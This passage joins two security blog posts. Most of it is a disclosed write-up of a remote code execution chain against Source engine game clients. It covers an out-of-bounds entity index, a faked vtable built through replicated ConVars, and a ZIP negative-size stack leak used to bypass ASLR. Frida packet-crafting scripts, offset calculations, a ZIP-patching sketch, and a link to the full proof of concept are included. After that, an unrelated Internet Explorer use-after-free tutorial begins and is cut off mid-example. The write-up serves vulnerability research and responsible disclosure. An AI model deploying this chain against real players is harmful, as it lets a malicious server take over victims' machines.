	Assert( entnum < MAX_EDICTS );
	return m_EntityCacheInfo[entnum].m_pNetworkable;
}

As we see here, these Assert statements would typically check that this value is sane and crash the game if it weren't. But this is not what happens in practice: Assert statements are not compiled into release builds of the game. This is for performance reasons, as the #1 goal of any game engine programmer is speed first, everything else second.

Anyway, these Assert statements do not prevent us from controlling entnum arbitrarily. m_EntityCacheInfo exists inside of a globally defined structure, entitylist, inside of client.dll. This object holds the client’s central store of all data related to game entities. Because m_EntityCacheInfo is at a static global offset, we can easily calculate the proper value of entnum for our exploit by locating the offset of m_EntityCacheInfo in any given version of client.dll and choosing entnum so that it produces our target pointer.

Here is what an object inside of m_EntityCacheInfo looks like:

// Cached info for networked entities.
// NOTE: Changing this changes the interface between engine & client
struct EntityCacheInfo_t
{
	// Cached off because GetClientNetworkable is called a *lot*
	IClientNetworkable *m_pNetworkable;
	unsigned short m_BaseEntitiesIndex;	// Index into m_BaseEntities (or m_BaseEntities.InvalidIndex() if none).
	unsigned short m_bDormant;	// cached dormant state - this is only a bit
};

Altogether, this vulnerability allows us to return an arbitrary IClientNetworkable* from GetClientNetworkable as long as it is aligned to an 8-byte boundary (since sizeof(EntityCacheInfo_t) == 8). This is important for the exploit chaining to come.

Lastly, the result of returning an arbitrary IClientNetworkable* is that there is immediately this function call on our controlled pEnt pointer:

pEnt->PreDataUpdate( DATA_UPDATE_DATATABLE_CHANGED );

This is a virtual function call. This means that the generated code will offset into pEnt’s vtable and call a function. This looks like so in IDA:

image-20200507164606006

Notice call dword ptr [eax+24]. This implies that the vtable index is at 24 / 4 = 6, which is also important to know for future exploitation.

And that’s it, we have our first bug. This will allow us to control, within reason, the location of a fake object in the client to later craft into an arbitrary execute. But how are we going to create a fake object at a known location such that we can convince CL_CopyExistingEntity to call the address of our choice? Well, we can take advantage of the fact that the server can set any arbitrary value to a ConVar on a client, and most ConVar objects exist in globals defined inside of client.dll.

The definition of ConVar is:

class ConVar : public ConCommandBase, public IConVar

Where the general structure of a ConVar looks like:

ConCommandBase *m_pNext; [0x00]
bool m_bRegistered; [0x04]
const char *m_pszName; [0x08]
const char *m_pszHelpString; [0x0C]
int m_nFlags; [0x10]
ConVar *m_pParent; [0x14]
const char *m_pszDefaultValue; [0x18]
char *m_pszString; [0x1C]

In this bug, we’re targeting m_pszString so that our crafted pointer lands directly on it. When the bug calls our function, the engine will believe that &m_pszString is the location of the object’s pointer, and m_pszString will contain its vtable pointer. The engine will now believe that any value inside of m_pszString for the ConVar is part of the object’s structure. Then, it will call a function pointer at *((*m_pszString)+0x18) (vtable index 6, from the disassembly above). As long as the ConVar on the client is marked as FCVAR_REPLICATED, the server can set its value arbitrarily, giving us full control over the contents of m_pszString. If we point the vtable pointer to the right place, this will give us control over the instruction pointer!

m_pszString is at offset 0x1C in the above ConVar structure, but the terms of our vulnerability require that this pointer be aligned to an 8-byte boundary. Therefore, we need to find a suitable candidate ConVar that is both globally defined and replicated, so that its m_pszString is aligned correctly for us to return it from GetClientNetworkable.

This can be seen by what GetClientNetworkable looks like in x64dbg:

image-20200507170851575

In the above, the pointer we can return is controlled as such:

ecx+eax*8+28 where ecx is entitylist, eax is controlled by us

With a bit of searching, I found that the ConVar sv_mumble_positionalaudio exists in client.dll and is replicated. Here it exists at 0x10C6B788 in client.dll:

image-20200507173708203

This means that to calculate the address of m_pszString, we add 0x1C to get 0x10C6B788 + 0x1C = 0x10C6B7A4. In this build, entitylist is at an aligned offset of 4 (0xC580B4). So, now we can check whether this candidate is aligned properly:

>>> 0x10c6b7a4 % 0x8
4

This might look wrong, but entitylist is actually aligned to a 0x04 boundary, so that will add an extra 0x04 to the above alignment, making this value successfully align to 0x08!

Now we’re good to go ahead and use the m_pszString value of sv_mumble_positionalaudio to fake our object’s vtable pointer by using the server to control the string data contents through ConVar replication.
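Deriving the entnum value to send is just a matter of inverting the indexing math from the disassembly above (ecx+eax*8+28, in hex). Here is a minimal sketch of that calculation, assuming the addresses of entitylist and the target ConVar have already been resolved for the current build (the 0x28 comes from the GetClientNetworkable disassembly, the 0x1C is the offset of m_pszString within ConVar):

#include <stdint.h>

// Returns the value to place in u.m_nNewEntity, or -1 if the target slot
// is not reachable with the 8-byte stride used by GetClientNetworkable.
int32_t CalcEntnum(uintptr_t entitylist, uintptr_t convar)
{
    uintptr_t targetSlot = convar + 0x1C;      // &m_pszString, treated as the m_pNetworkable slot
    uintptr_t firstSlot  = entitylist + 0x28;  // start of m_EntityCacheInfo
    intptr_t  delta      = (intptr_t)(targetSlot - firstSlot);

    if (delta % 8 != 0)
        return -1;

    return (int32_t)(delta / 8);
}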

In summary, this is the path the code above will take:

  • Call GetClientNetworkable to get pEnt, which we will fake to point to &m_pszString.
  • The code dereferences the first value inside of m_pszString to get the pointer to the vtable
  • The code offsets the vtable to index 6 and calls the first function there. We need to make sure we point this to a place we control, otherwise we would only be controlling the vtable pointer and not the actual function address in the table.
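Written out as a rough C sketch, this is what the engine effectively ends up doing with our fake object (the types and the DATA_UPDATE_DATATABLE_CHANGED value here are simplifications; the real call is a 32-bit __thiscall through the IClientNetworkable vtable):

// pEnt is the value GetClientNetworkable read out of the m_pszString slot, i.e. a pointer
// to the server-controlled string bytes. The first dword of that string acts as the vtable pointer.
typedef void (*PreDataUpdate_t)(void *thisptr, int updateType);

void FakeVirtualCall(void *pEnt)
{
    void **vtable = *(void ***)pEnt;                  // first dword of the string -> fake vtable
    PreDataUpdate_t fn = (PreDataUpdate_t)vtable[6];  // index 6 (byte offset 0x18 on 32-bit x86)
    fn(pEnt, 1 /* DATA_UPDATE_DATATABLE_CHANGED, value illustrative */);
}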

But where are we going to point the vtable? Well, we don’t need much, just a location of a known place the server can control so we can write an address we want to execute. I did some searching and came across this:

bool NET_Tick::ReadFromBuffer( bf_read &buffer )
{
	VPROF( "NET_Tick::ReadFromBuffer" );

	m_nTick = buffer.ReadLong();
#if PROTOCOL_VERSION > 10
	m_flHostFrameTime = (float)buffer.ReadUBitLong( 16 ) / NET_TICK_SCALEUP;
	m_flHostFrameTimeStdDeviation = (float)buffer.ReadUBitLong( 16 ) / NET_TICK_SCALEUP;
#endif
	return !buffer.IsOverflowed();
}

As you might see, m_nTick is controlled by the contents of the NET_Tick packet directly. This means we can assign this to an arbitrary 32-bit value. It just so happens that this value is stored at a global as well! After some scripting up in Frida, I confirmed that this is indeed completely controllable by the NET_Tick packet from the server:

image-20200513141444074

The code to send this packet with my Frida bindings is quite simple too:

function SetClientTick(bf: bf_write, value: NativePointer) {
    bf.WriteUBitLong(net_Tick, NETMSG_BITS)

    // Tick count (Stored in m_ClientGlobalVariables->tickcount)
    bf.WriteLong(value.toInt32())

    // Write m_flHostFrameTime -> 1
    bf.WriteUBitLong(1, 16);

    // Write m_flHostFrameTimeStdDeviation -> 1
    bf.WriteUBitLong(1, 16);
}

Now we have a candidate location to point our vtable pointer. We just have to point it at &tickcount - 24 and the engine will believe that tickcount is the function that should be called in the vtable. After a bit of testing, here’s the resulting script which creates and sends the SVC_PacketEntities packet to the client to trigger the exploit:

// craft the netmessage for the PacketEntities exploit
function SendExploit_PacketEntities(bf: bf_write, offset: number) {
    bf.WriteUBitLong(svc_PacketEntities, NETMSG_BITS)

    // Max entries
    bf.WriteUBitLong(0, 11)

    // Is Delta?
    bf.WriteBit(0)

    // Baseline?
    bf.WriteBit(0)

    // # of updated entries?
    bf.WriteUBitLong(1, 11)

    // Length of update packet?
    bf.WriteUBitLong(55, 20)

    // Update baseline?
    bf.WriteBit(0)

    // Data_in after here
    bf.WriteUBitLong(3, 2) // our data_in is of type 32-bit integer

    // >>>>>>>>>>>>>>>>>>>> The out of bounds type confusion is here <<<<<<<<<<<<<<<<<<<<
    bf.WriteUBitLong(offset, 32)

    // enterpvs flag
    bf.WriteBit(0)

    // zero for the rest of the packet
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
}

Now we’ve got the following modified chain:

  • Call GetClientNetworkable to get pEnt, which we will fake to point to &m_pszString.
  • The code dereferences the first value inside of m_pszString to get the pointer to the vtable. We point this at &tickcount - 6*4 which we control.
  • The code offsets the vtable to index 6, dereferences, and calls the “function”, which will be the value we put in tickcount.

This generally looks like this in the exploit script:

// The fake object pointer and the ROP chain are stored in this cvar
ReplicateCVar(pkts_to_send, "sv_mumble_positionalaudio", tickCountAddress)

// Set a known location inside of engine.dll so we can use it to point our vtable value to
SetClientTick(pkts_to_send, new NativePointer(0x41414141))

// Then use exploit in PacketEntities to fake the object pointer to point to sv_mumble_positionalaudio's string value
SendExploit_PacketEntities(pkts_to_send, 0x26DA) 

0x26DA was calculated above to be the necessary entnum value to cause the out-of-bounds and align us to sv_mumble_positionalaudio->m_pszString.

Finally, we can see the results of our efforts:

image-20200513142919977

As we can see here, 0x41414141 is being popped off the stack at the ret, giving us a one-shot arbitrary execute! What you can’t see here is that, further down on the stack, our entire packet is sitting there unchanged, giving us ample room for a ROP chain.

Now, all we need is a pivot, which can be easily found using the Ropper project. After finding an appropriate pivot, we now can begin crafting a ROP chain… except we are missing something important. We don’t know where any gadgets are located in memory, including our stack pivot! Up until now, everything we’ve done is with relative offsets, but now we don’t even know where to point the value of 0x41414141 to on the client, because the layout of the code is randomized by ASLR. The easy way out would be to load up CS:GO and use xinput.dll addresses for our ROP chain… but that would violate my arbitrary constraint that this exploit must work for all Source games.

This means we need to go infoleak hunting.

Leaking uninitialized stack memory using a tricky ZIP file bug

After auditing the engine for many days over the course of a few months, I was finally able to engineer a series of tricks to chain together to cause the engine to leak uninitialized stack memory. This was all-in-all significantly harder than the memory corruption, and required a lot of out-of-the-box thinking to get it to work. This was my favorite part of the exploit. Here’s some background on how some of these systems work inside the engine and how they can be chained together:

  • Servers can cause the client to upload arbitrary files with certain file extensions
  • Map files can contain an embedded ZIP file which can package additional textures/files. This is called a “pakfile”.
  • When the map has a pakfile, the engine adds the zip file as sort of a “virtual overlay” on the regular filesystem the game uses to read/write files. This means that, in any file accesses the game makes, it will check the map’s pakfile to see if it can read it from there.

The interesting behavior I discovered about this system is that, if the server requests a file that is inside of the map’s pakfile, the client will upload that file from the embedded ZIP to the server. This wouldn’t make any sense in a normal case, but what it does is create a very unintended attack surface.

Now, let’s take a look at the function which is responsible for determining how large the file is that is going to be uploaded to the server, and if it is too large to be sent:

int totalBytes = g_pFileSystem->Size( filename, pPathID );

if ( totalBytes >= (net_maxfilesize.GetInt()*1024*1024) )
{
    ConMsg( "CreateFragmentsFromFile: '%s' size exceeds net_maxfilesize limit (%i MB).\n", filename, net_maxfilesize.GetInt() );
    return false;
}

So, what happens inside of g_pFileSystem->Size when you point it to a file inside the pakfile? Well, the code reads the ZIP file structure and locates the file, then reads the size directly from the ZIP header:

image-20200430014752750

Notice: lookup.m_nLength = zipFileHeader.uncompressedSize

Now we fully control the contents of the map file we gave to the client when they loaded in. Therefore, we control all the contents of the embedded pakfile inside the map. This means we control the full 32-bit value returned by g_pFileSystem->Size( filename, pPathID );.

So, maybe you have noticed where we’re going. int totalBytes is a signed integer, and the comparison for whether a file is too large is determined by a signed comparison. What happens when totalBytes is negative? That makes it fully pass the length check.

If we are able to hack a file with a negative length into the ZIP structure, the engine will now happily upload it to the server.
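As a toy illustration of why the check passes (assuming a net_maxfilesize of 16 MB, which is just an example value), consider:

#include <stdio.h>

int main(void)
{
    unsigned int uncompressedSize = 0xFFFFFFF0u;   // hacked value in the ZIP header
    int totalBytes = (int)uncompressedSize;        // interpreted as -16 by the signed check
    int net_maxfilesize = 16;

    if (totalBytes >= net_maxfilesize * 1024 * 1024)
        printf("rejected: file too large\n");
    else
        printf("accepted: totalBytes = %d\n", totalBytes);   // negative, so the check passes

    return 0;
}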

Let’s look at the function responsible for reading the file to be uploaded to the server.

Inside of CNetChan::SendSubChannelData:

g_pFileSystem->Seek( data->file, offset, FILESYSTEM_SEEK_HEAD );
g_pFileSystem->Read( tmpbuf, length, data->file );
buf.WriteBytes( tmpbuf, length );

A stack buffer of size 0x100 is used to read the contents of the file in 0x100-sized chunks as the file is sent to the server. It does so by calling g_pFileSystem->Read() on the file pointer and reading the data out to a temporary buffer on the stack. The subchannel believes this file to be very large (as the subchannel interprets the size as an unsigned integer). The networking code will indefinitely send chunks to the server by allocating 0x100 bytes of stack space and calling ->Read(). But when the file pointer reaches the end of the pakfile, the calls to ->Read() stop writing any data to the stack, as there is no data left to read. Rather than failing out of this function, the return value of ->Read() is ignored and the data is sent anyway. Because the stack’s contents are not cleared with each iteration, 0x100 bytes of uninitialized stack data are sent to the server constantly. The client’s subchannel will continue to send fragments indefinitely, as the “file size” is too large to ever be sent successfully.
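Modeled as a standalone sketch (SendToServer is a stand-in for the real fragment send; the actual loop lives in CNetChan::SendSubChannelData shown above):

#include <stdio.h>

static void SendToServer(const char *buf, size_t len) { (void)buf; (void)len; /* stand-in */ }

// Each iteration reuses an uninitialized 0x100-byte stack buffer. Once the pakfile hits
// EOF, fread() returns 0, but the buffer is sent regardless, leaking stale stack data.
void SendChunks(FILE *f, size_t claimedSize)
{
    for (size_t sent = 0; sent < claimedSize; sent += 0x100)
    {
        char tmpbuf[0x100];
        size_t got = fread(tmpbuf, 1, sizeof(tmpbuf), f);
        (void)got;                                 // return value ignored, just like the engine
        SendToServer(tmpbuf, sizeof(tmpbuf));
    }
}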

After quite a bit of learning about how the PKZIP file structure works, I was able to write up this Python script which can take an existing BSP and hack in a negatively sized file into the pakfile. Here’s the result:

image-20200506163703366
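
The actual tool is the Python script mentioned above; purely for illustration, here is a hedged C++ sketch of the core trick, using the standard PKZIP field offsets (the uncompressed size lives at +22 in a local file header and +24 in a central directory entry). The real script adds a dedicated file and only touches that entry, and which header the engine ultimately trusts is worth verifying against the Size() implementation.

#include <cstdint>
#include <cstdio>
#include <cstring>
#include <vector>

// Overwrite the 32-bit "uncompressed size" fields in a raw ZIP/pakfile buffer
// with a value that turns negative when read back as a signed int.
// A little-endian host is assumed, matching the ZIP on-disk format.
static void PatchUncompressedSizes(std::vector<uint8_t>& zip, uint32_t bogusSize)
{
    const uint8_t localSig[4]   = { 0x50, 0x4B, 0x03, 0x04 }; // PK\x03\x04
    const uint8_t centralSig[4] = { 0x50, 0x4B, 0x01, 0x02 }; // PK\x01\x02

    for (size_t i = 0; i + 30 <= zip.size(); i++)
    {
        if (memcmp(&zip[i], localSig, 4) == 0)
            memcpy(&zip[i + 22], &bogusSize, 4); // local header: uncompressed size
        else if (memcmp(&zip[i], centralSig, 4) == 0)
            memcpy(&zip[i + 24], &bogusSize, 4); // central directory: uncompressed size
    }
}

int main(int argc, char** argv)
{
    if (argc < 3) return 0;

    FILE* in = fopen(argv[1], "rb");
    if (!in) return 1;
    std::vector<uint8_t> zip;
    uint8_t chunk[4096];
    size_t got;
    while ((got = fread(chunk, 1, sizeof(chunk), in)) > 0)
        zip.insert(zip.end(), chunk, chunk + got);
    fclose(in);

    PatchUncompressedSizes(zip, 0xFFFFFFF0u);

    FILE* out = fopen(argv[2], "wb");
    if (!out) return 1;
    fwrite(zip.data(), 1, zip.size(), out);
    fclose(out);
    return 0;
}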

Now, we can test it by loading up Frida and crafting a packet to request the hacked file be uploaded to the server from the pakfile. Then, we can enable net_showfragments 1 in the game’s console to see all of the fragments that are being sent to us:

image-20200506171807825

This shows us that the client is sending many file fragments (num = 1 means file fragment). When left running, it will not stop re-leaking that stack memory to us, and will just continue to do so infinitely as long as the client is connected. This happens slowly over time, so the client’s game is unaffected.

I also placed a Frida Interceptor hook on the function responsible for reading the file’s size, and here we can see that it is indeed returning a negative number:

image-20200506164957309

Lastly, I hooked the function responsible for processing incoming file fragment packets on the server, and lo and behold, I have this blob of data being sent to us:

           0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
00000000  50 4b 05 06 00 00 00 00 06 00 06 00 f0 01 00 00  PK..............
00000010  86 62 00 00 20 00 58 5a 50 31 20 30 00 00 00 00  .b.. .XZP1 0....
00000020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000030  00 00 00 00 00 00 fa 58 13 00 00 58 13 00 00 26  .......X...X...&
00000040  00 00 00 00 00 00 00 00 00 00 00 00 00 19 3b 00  ..............;.
00000050  00 6d 61 74 65 72 69 61 f0 5e 65 62 30 2e b9 05  .materia.^eb0...
00000060  60 55 65 62 9c 76 71 00 ce 92 61 62 f0 5e 65 62  `Ueb.vq...ab.^eb
00000070  08 0b b9 05 b8 00 7c 6d 30 2e b9 05 b9 00 7c 6d  ......|m0.....|m
00000080  f0 5e 65 62 f0 5e 65 62 f0 89 61 62 f0 5e 65 62  .^eb.^eb..ab.^eb
00000090  44 00 00 00 60 55 65 62 60 55 65 62 00 00 00 00  D...`Ueb`Ueb....
000000a0  00 b5 4e 00 00 6d 61 74 65 72 69 61 6c 73 2f 6d  ..N..materials/m
000000b0  61 70 73 2f 63 70 5f 63 ec 76 71 00 00 02 00 00  aps/cp_c.vq.....
000000c0  0a a4 bc 7b 30 2e b9 05 f0 70 88 68 40 00 00 00  ...{0....p.h@...
000000d0  00 a5 db 09 01 00 00 00 c4 dc 75 00 16 00 00 00  ..........u.....
000000e0  00 00 00 00 98 77 71 00 00 00 00 00 00 00 00 00  .....wq.........
000000f0  30 77 71 00 cb 27 b3 7b 00 03 00 00 97 27 b3 7b  0wq..'.{.....'.{

You might not be able to tell, but this data is uninitialized. Specifically, there are pointer values that begin with 0x7B or 0x7C littered in here:

  • 97 27 b3 7b
  • 0a a4 bc 7b
  • 05 b9 00 7c
  • 05 b8 00 7c

The offsets of these pointer values in the 0x100 byte buffer are not always at the same place. Some heuristics definitely go a long way here. A simple mapping of DWORD values inside the buffer over time can show that some values quickly look like pointers and some do not. After a bit of tinkering with this leak, I was able to get it under control and leak a known pointer value with ~100% certainty.
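
The exploit’s server side does this filtering in its Frida agent; as a language-agnostic illustration, here is a hedged C++ sketch of the kind of filter involved. The 0x7A-0x7C upper-byte range and the stable 0xE4 slot are observations specific to this target, not general rules.

#include <cstdint>
#include <cstdio>
#include <cstring>

// Scan one leaked 0x100-byte fragment for 32-bit values that plausibly point
// into a loaded user-mode module, and report where they sit in the buffer.
static void FindCandidatePointers(const uint8_t* frag, size_t len)
{
    for (size_t off = 0; off + 4 <= len; off += 4)
    {
        uint32_t value;
        memcpy(&value, frag + off, sizeof(value));

        uint8_t top = (uint8_t)(value >> 24);
        if (top >= 0x7A && top <= 0x7C)
            printf("candidate at +0x%zx: 0x%08x\n", off, value);
    }
}

int main()
{
    // In the real chain this buffer is each incoming file fragment; tracking
    // which offsets repeatedly produce candidates (0xE4 on this target) is
    // what made the leak reliable.
    uint8_t fragment[0x100] = { 0 };
    FindCandidatePointers(fragment, sizeof(fragment));
    return 0;
}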

Here’s what the final output of the exploit looked like against a typical user:

[*] Intercepting ReadBytes (frag = 0)
0x0: 0x14b5041
0x4: 0x14001402
0x8: 0x0
0xc: 0x0
0x10: 0xd99e8b00
0x14: 0xffff00d3
0x18: 0xffff00ff
0x1c: 0x8ff
0x20: 0x0
0x24: 0x0
0x28: 0x18000
0x2c: 0x74000000
0x30: 0x2e747365
0x34: 0x50747874
0x38: 0x6054b
0x3c: 0x1000000
0x40: 0x36000100
0x44: 0x27000000
[...]
0xcc: 0xafdd68
0xd0: 0xa097d0c
0xd4: 0xa097d00
0xd8: 0xab780c
0xdc: 0x4
0xe0: 0xab7778
0xe4: 0x7ac9ab8d
0xe8: 0x0
0xec: 0x80
0xf0: 0xab7804
0xf4: 0xafdd68
0xf8: 0xab77d4
0xfc: 0x0
[*] leakedPointer: 0x7ac9ab8d
[*] Engine_Leak2 offset: 0x23ab8d
[*] leakedBase: 0x7aa60000

Only one of these values had a lower WORD offset that made sense (0xE4), so it was easily selectable from the list of DWORDs. After leaking this pointer, I traced it back in IDA to a return location for the upper stack frame of this function, which makes total sense. I gave it the label Engine_Leak2 in IDA, which could be loaded directly from my ret-sync connection to dynamically calculate the proper base address of the engine.dll module:

// calculate the engine base based on the RE'd address we know from the leak
static convertLeakToEngineBase(leakedPointer: NativePointer) {
    console.log("[*] leakedPointer: " + leakedPointer)

    // get the known offset of the leaked pointer in our engine.dll
    let knownOffset = se.util.require_offset("Engine_Leak2");
    console.log("[*] Engine_Leak2 offset: " + knownOffset)

    // use the offset to find the base of the client's engine.dll
    let leakedBase = leakedPointer.sub(knownOffset);
    console.log("[*] leakedBase: " + leakedBase)

    if ((leakedBase.toInt32() & 0xFFFF) !== 0) {
        console.log("[!] Failed leak...")
        return null;
    }

    console.log("[*] Got it!")
    return leakedBase;
}

The Final Chain + RCE!

After successfully developing the infoleak, we now have both a pointer leak and an arbitrary execute bug. These two are sufficient for us to craft a ROP chain and pop that sweet sweet calculator. The nice part about Frida being a Python module at its core is that you can use pyinstaller to turn any Frida script into an all-in-one executable. That way, all you have to do is copy the .exe onto a server, run your Source dedicated server, and launch the .exe to arm the server for exploitation.

Anyway, here is the full step-by-step detail of chaining the two bugs together:

  1. Player joins the exploitation server. This is picked up by the PoC script and it begins to exploit the client.

  2. Player downloads the map file from the server. The map file is specially prepared to install test.txt into the GAME filesystem path with the compromised length.

  3. The server executes RequestFile to request the test.txt file from the pakfile. The client builds fragments for the new file and begins sending 0x100 sized fragments to the server, leaking stack contents. Inside the stack contents is a leaked stack frame return address from a previous call to bf_read::ReadBytes. By doing some calculations on the server, this achieves a full ASLR protection bypass on the client.

  4. The malicious server calculates the base of engine.dll on the client instance using the leaked pointer. This allows the server to now build a pointer value in the exploit payload to anywhere within engine.dll. Without this infoleak bug, the payload could not be built because the attacker does not know the location of any module due to ASLR.

  5. The server script builds a fake vtable on the target client instance by replicating a ConVar onto the client. This places the fake vtable, and a pointer to it, at a known location (the global ConVar). The PoC replicates the fake vtable onto sv_mumble_positionalaudio, which is a replicated ConVar inside of client.dll. The location of the contents of this replicated ConVar can be calculated from sv_mumble_positionalaudio->m_pszString and is used for later exploitation steps.

  6. The server builds a ROP chain payload to execute the Windows API call for ShellExecuteA. This ROP chain is used to bypass the NX protection on modern Windows systems. The chain utilizes the known addresses in engine.dll that were leaked from the exploitation of the separate bug in Step 3. Upon successful exploitation, this ROP chain can execute arbitrary code.

  7. The script again replicates the ConVar sv_downloadurl onto the client instance with the value of C:/Windows/System32/winver.exe. This is used by the ROP chain as the target program to execute with ShellExecuteA. This ConVar exists inside of engine.dll so the pointer sv_download_url->m_pszString is now at an attacker known location.

  8. The server sends a crafted NET_Tick message to modify the value of g_ClientGlobalVariables->tickcount to be a pointer to a stack pivot gadget found inside of engine.dll (again, leaked from Step 3). Essentially, this is another trick to get a pointer value to exist at an attacker controlled location within engine.dll.

  9. Now, the next bug will be used by creating a specially crafted SVC_PacketEntities netmessage which will call CL_CopyExistingEntity on the client instance with the vulnerable value for m_nNewEntity. This value will exploit the array overrun in GetClientNetworkable inside of client.dll and allows us to confuse the pointer return value to instead be a pointer to sv_mumble_positionalaudio->m_pszString (also inside client.dll). At the location of sv_mumble_positionalaudio->m_pszString is the fake object pointer created in Step 5. This object pointer redirects execution by pretending to be an IClientNetworkable* object, sending the virtual method call to the value found within g_ClientGlobalVariables->tickcount. This means we can set the instruction pointer to any value specified by the NET_Tick trick we used in Step 8.

  10. Lastly, to execute the ROP chain and achieve RCE, g_ClientGlobalVariables->tickcount is pointed to a stack pivot gadget inside of engine.dll. This pivots the stack to the ROP payload that was placed in sv_mumble_positionalaudio->m_pszString in Step 5. The ROP chain then begins execution. The chain will load the necessary arguments to call ShellExecuteA, then execute whatever program path we replicated onto sv_downloadurl in Step 7. In this case, it is used to execute winver.exe as a proof of concept. This chain can execute any code of the attacker’s choosing, and has full permissions to access all of the user’s files and data.

And there you have it. This entire exploitation happens automatically, using Frida to inject into the dedicated server process and instrument it to perform all of the steps above. This is quite involved, but the result is pretty awesome! Here’s a video of the full PoC in action; be sure to full screen it so it’s easier to see:

Disclosure Timeline

  • [2020-05-13] Reported to Valve through HackerOne
  • [2020-05-18] Bug triaged
  • [2021-04-28] Notification that the bugs were fixed in Beta
  • [2021-04-30] Bounty paid ($7500) and notification that the bugs were fixed in Retail

Supporting Files

Exploit PoC and the map hacking Python script referenced in this post are available in full at:

https://github.com/Gbps/sourceengine-packetentities-rce-poc

For the Frida exploit chain: https://github.com/Gbps/sourceengine-packetentities-rce-poc/tree/master/src/agent

Be sure to give it a ⭐ if you liked it!

Final thoughts

This chain was super fun to develop, and the constraints I placed on myself made the exploit way more interesting than my first submission. I’m glad that the report finally went through so I could publish the information for everyone to read. It really goes to show that even a fairly simple set of bugs on paper can turn into a complex exploitation effort quickly when targeting big software applications. But, doing so helps you develop skills that you might not necessarily pick up from simple CTF problems.

Incorporating the Frida project definitely reinvigorated my drive to continue poking and testing PoCs for bugs, as the process for scripting up examples was much nicer than before. I hope to spend some time in a future post to discuss more ways to utilize Frida on the desktop, and also hope to publish my ret-sync Frida plugin in an official capacity on my GitHub soon.

I’m also working on some other projects in the meantime, off-and-on. Among them, I have been writing a fairly large project which implements a CS:GO client from scratch in Rust to help improve my skills with the language. After a ton of work, I can happily say my client can authenticate with Steam, fully connect and load into a server, send and receive netchannel packets with the game server, and host a fake console to execute concommands. There is no graphical portion of this; it is entirely command-line based.

In addition, I’ve started to shift my focus somewhat away from Source and onto Steam itself. Steam is a vastly complex application, and the networking protocol it uses is orders of magnitude more complex than that of Source. There hasn’t been too much research done in the public on Steam’s networking protocols, so I’ve written a few tools that can fully encode/decode this networking layer and intercept packets to learn how they work. Even an idle instance of Steam creates a lot of very interesting traffic that very few people have looked at! More information on this hopefully soon.

For now, I don’t have a timeline for the release of any of those projects, or for the next blog post I will write, but hopefully it won’t be as long as it took to get this one out ;)

Thank you for reading!

☑ ★ ✇ Connor McGarr

Exploit Development: Browser Exploitation on Windows - Understanding Use-After-Free Vulnerabilities

By: Connor McGarr

Introduction

Browser exploitation is a topic that has been incredibly daunting for myself. Looking back at my journey over the past year and a half or so since I started to dive into binary exploitation, specifically on Windows, I remember experiencing this same feeling with kernel exploitation. I can still remember one day just waking up and realizing that I needed to dive into it if I ever wanted to advance my knowledge. Looking back, although I still have tons to learn about it and am still a novice at kernel exploitation, I realized it was my will to just jump in, irrespective of the difficulty level, that helped me to eventually grasp some of the concepts surrounding more modern kernel exploitation.

Browser exploitation has always been another fear of mine, even more so than the Windows kernel, due to the fact that not only do you need to understand overarching exploit primitives and vulnerability classes that are specific to Windows, but you also need to understand other topics such as the different JavaScript engines, just-in-time (JIT) compilers, and a plethora of other subjects, which by themselves are difficult (at least to me) to understand. Plus, the addition of browser-specific mitigations has also been a determining factor in my putting off learning this subject.

What has always been frightening is the lack (in my estimation) of resources surrounding browser exploitation on Windows. Many people can just dissect a piece of code and come up with a working exploit within a few hours. This is not the case for myself. The way I learn is to take a POC, along with an accompanying blog, and walk through the code in a debugger. From there I analyze everything that is going on and try to ask myself the question “Why did the author feel it was important to mention X concept or show Y snippet of code?”, and to also attempt to answer that question. In addition to that, I try to first arm myself with the prerequisite knowledge to even begin the exploitation process (e.g. “The author mentioned this is a result of a fake virtual function table. What is a virtual function table in the first place?”). This helps me to understand the underlying concepts. From there, I am able to take other POCs that leverage the same vulnerability classes and weaponize them - but it takes that first walkthrough for myself.

Since this is my learning style, I have found that blogs on Windows browser exploitation which start from the beginning are very sparse. Since I use blogging as a mechanism not only to share what I know, but to reinforce the concepts I am attempting to hit home, I thought I would take a few months, now with Advanced Windows Exploitation (AWE) being canceled again for 2021, to research browser exploitation on Windows and to talk about it.

Please note that what is going to be demonstrated here is not heap spraying as an execution method. These will be actual vulnerabilities that are exploited. However, it should also be noted that this will start out on Internet Explorer 8, on Windows 7 x86. We will still outline leveraging code-reuse techniques to bypass DEP, but don’t expect MemGC, Delay Free, etc. to be enabled for this tutorial, and most likely for the next few. This will simply be a documentation of my thought process, should you care, of how I went from crash to vulnerability identification, and hopefully to a shell in the end.

Understanding Use-After-Free Vulnerabilities

As mentioned above, the vulnerability we will be taking a look at is a use-after-free. More specifically, MS13-055, which is titled Microsoft Internet Explorer CAnchorElement Use-After-Free. What exactly does this mean? Use-after-free vulnerabilities are well documented, and fairly common. There are great explanations out there, but for brevity and completeness’ sake I will take a swing at explaining them. Essentially what happens is this - a chunk of memory (chunks are just contiguous pieces of memory, like a buffer. Each piece of memory, known as a block, on x86 systems is 0x8 bytes, or 2 DWORDs. Don’t over-think them) is allocated by the heap manager (on Windows there is the front-end allocator, known as the Low-Fragmentation Heap, and the standard back-end allocator. We will talk about these in a future section). At some point during the program’s lifetime, this chunk of memory, which was previously allocated, is “freed”, meaning the allocation is cleaned up and can be re-used by the heap manager again to service allocation requests.

Let’s say the allocation was at the memory address 0x15000. Let’s say the chunk, when it was allocated, contained 0x40 bytes of 0x41 characters. If we dereferenced the address 0x15000, you could expect to see 0x41s (this is pseudo-speak and should just be taken at a high level for now). When this allocation is freed, if you go back and dereference the address again, you could expect to see invalid memory (e.g. something like ???? in WinDbg), if the address hasn’t been used to service any allocation requests, and is still in a free state.

Where the vulnerability comes in is that the chunk, which was allocated but is now freed, is still referenced/leveraged by the program, although in a “free” state. The program is attempting to access and/or dereference memory that simply isn’t valid anymore, which usually causes some sort of exception, resulting in a program crash.
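
To make the definition concrete, here is a minimal sketch of the condition (a plain heap buffer rather than the class objects we will deal with shortly):

#include <cstdio>
#include <cstdlib>
#include <cstring>

int main()
{
    // Allocate a chunk and fill it with 0x41 ('A') characters.
    char* chunk = (char*)malloc(0x40);
    if (!chunk) return 1;
    memset(chunk, 0x41, 0x40);

    // Free the chunk - the heap manager may now hand this memory back out
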